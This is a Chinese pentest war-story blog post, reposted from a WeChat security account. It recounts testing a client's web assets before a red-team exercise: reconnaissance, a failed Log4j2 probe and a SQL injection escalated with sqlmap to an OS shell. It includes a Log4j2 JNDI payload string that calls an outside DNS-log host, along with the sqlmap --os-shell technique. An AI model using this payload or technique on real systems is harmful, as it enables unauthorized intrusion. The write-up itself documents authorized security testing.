记一次安服仔的逆袭 | 实战

admin 2022年1月5日01:01:16安全文章评论28 views1044字阅读3分28秒阅读模式

本文作者:七七七(首次投稿,奖励信安之路知识星球体验卡,免费注册成长平台和内部Wiki)

按照惯例,每次护网开打的前几天,业务都会带着我们上门给甲方爸爸做安全服务。这次不知道是不是业务喝酒喝多了,居然跟甲方爸爸打包票能够找出大问题,而且就给我一天的时间,这不是为难我胖虎吗.jpg。

既然无力反抗,就只好躺平了。

首先看来看客户给的资产,嗯下面有清清楚楚的 8 个 url: 

记一次安服仔的逆袭 | 实战

虽然不全,但至少给了几个 ip,能够加快我们信息收集的速度。先打一套信息收集组合拳, oneforall、fofa、quike等等,整理完资产最后成果如下。

记一次安服仔的逆袭 | 实战

但我看到 xxOA 的时候我的心情是愉悦的,想着最近的 log4j2 心想能够交差了,这不有手...,呸有工具就行。

先看 OA,拿出大佬的 seeyou-GUi 工具一顿操作,然而并没有什么用。可能是开发打过补丁了。

开始测试 log4j2, 被动扫描开启,检测 log4j2,没有出现我预期的情况,难道也被修复了吗?

记一次安服仔的逆袭 | 实战

不信邪的我开始手工测试,登录框插入 poc ${jndi:ldap://xxx.dnslog.cn/f3qetn} ,静待回显。

可惜 dnslog 毫无反应,换 ceye、burpcollaborator.net、xray 反连平台利用绕过语句继续测试。仍然没有没有回显,那就换下一个站,weblogic 是 10.3.6 的,工具没有利用成功。

tomcat 也没有弱口令,好吧不能偷懒了。

只能一个个站的去测试,目录爆破、暴力破解、burp+xray 联动、工具扫描。直到下午 3 点多,才测出两个小漏洞,开始思考以往看过的文章,对我来讲无非三个思路:

1、续收集资产 

2、寻找 js 接口 

3、弱口令突破。

但 1 和 3 这两种方法之前已经投入了比较多的时间,个人也不想继续了,寻找 js 接口的操作已经看过很多文章但并没有在实战中真正用到,不如趁着这次机会实践一下。

根据以往的经验,aspx 与 php 的网站的漏洞会比 jsp 网站多。那就先从 aspx 开始。

看了两个站的 js 以后,还是没有什么收获,突然一个 html 源码的 test() 函数让我觉得有点希望

记一次安服仔的逆袭 | 实战

已知是 json 格式,那就尝试一下,运气好,提示 id 参数未传入

记一次安服仔的逆袭 | 实战

xray 跑出一个 mssql 报错注入

记一次安服仔的逆袭 | 实战

sqlmap 检测可以 --os-shell,sqlmap 检测可以 --os-shell 这里算是拿下一台服务器权限了。可以交差了。

想知道执行 --os-shell 的原理吗?可以参加实战训练 | 从数据库功能到操作系统权限


原文始发于微信公众号(信安之路):记一次安服仔的逆袭 | 实战

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月5日01:01:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  记一次安服仔的逆袭 | 实战 http://cn-sec.com/archives/718505.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: